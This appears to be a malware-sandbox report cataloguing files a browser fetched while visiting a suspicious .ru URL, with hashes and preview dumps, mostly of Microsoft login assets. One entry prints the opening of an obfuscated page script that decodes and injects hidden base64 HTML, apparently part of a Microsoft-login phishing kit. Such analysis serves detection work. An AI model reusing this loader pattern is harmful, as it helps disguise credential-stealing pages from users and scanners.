                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                        Category:downloaded
                                                                        Size (bytes):122725
                                                                        Entropy (8bit):7.997347629519925
                                                                        Encrypted:true
                                                                        SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                        MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                        SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                        SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                        SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                        Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                        Category:dropped
                                                                        Size (bytes):122725
                                                                        Entropy (8bit):7.997347629519925
                                                                        Encrypted:true
                                                                        SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                        MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                        SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                        SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                        SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                        Category:downloaded
                                                                        Size (bytes):673
                                                                        Entropy (8bit):7.6596900876595075
                                                                        Encrypted:false
                                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                        Category:dropped
                                                                        Size (bytes):2672
                                                                        Entropy (8bit):6.640973516071413
                                                                        Encrypted:false
                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):61
                                                                        Entropy (8bit):3.990210155325004
                                                                        Encrypted:false
                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                        Category:dropped
                                                                        Size (bytes):49954
                                                                        Entropy (8bit):7.99493321471063
                                                                        Encrypted:true
                                                                        SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                        MD5:E16AC075AC754DBD1CF969508220E30D
                                                                        SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                        SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                        SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                        Category:downloaded
                                                                        Size (bytes):20410
                                                                        Entropy (8bit):7.980582012022051
                                                                        Encrypted:false
                                                                        SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                        MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                        SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                        SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                        SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                        Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                        Category:downloaded
                                                                        Size (bytes):2672
                                                                        Entropy (8bit):6.640973516071413
                                                                        Encrypted:false
                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (7481), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):19889
                                                                        Entropy (8bit):5.879467259150747
                                                                        Encrypted:false
                                                                        SSDEEP:384:UnuQF3jPHgDVv0OaB3lAnuQF3jPHgDVv0OaB3lHlrNlr9G6:E3b+MO01w3b+MO01HlrNlrU6
                                                                        MD5:E1278563EA1D5DB3A85EC7294C600025
                                                                        SHA1:DA1A116379164B5996C694CA42031BFF6B5CCCCE
                                                                        SHA-256:057FC0D387EEF85A59D5F9E189EE64F8A2E0866BC63C689769F1D627085B6C41
                                                                        SHA-512:F934B987FE01D1793795ADEDA44EA0EBBF9345716CA0F311C31ED6CBFFDC8B59C8620020C7B2FE09C325C3A569CEBBD46F0E2DA19DDD120E519EE835C2513382
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://56.hanagibenewe.ru/Y7MD/
                                                                        Preview:<script>../* The secret of getting ahead is getting started. */..if(atob("aHR0cHM6Ly9QUTUuaGFuYWdpYmVuZXdlLnJ1L1k3TUQv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3Zl
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                        Category:dropped
                                                                        Size (bytes):5525
                                                                        Entropy (8bit):7.961202222662501
                                                                        Encrypted:false
                                                                        SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                        MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                        SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                        SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                        SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (47520)
                                                                        Category:downloaded
                                                                        Size (bytes):47521
                                                                        Entropy (8bit):5.3981340461317835
                                                                        Encrypted:false
                                                                        SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                        MD5:7C92EC9D1395055CE0405A32607C7291
                                                                        SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                        SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                        SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                        Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                        Category:downloaded
                                                                        Size (bytes):35170
                                                                        Entropy (8bit):7.993096534744333
                                                                        Encrypted:true
                                                                        SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                        MD5:171A4DD9400708B88724B57D62B24A6A
                                                                        SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                        SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                        SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                        Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                        Category:dropped
                                                                        Size (bytes):673
                                                                        Entropy (8bit):7.6596900876595075
                                                                        Encrypted:false
                                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                        Category:downloaded
                                                                        Size (bytes):3620
                                                                        Entropy (8bit):6.867828878374734
                                                                        Encrypted:false
                                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
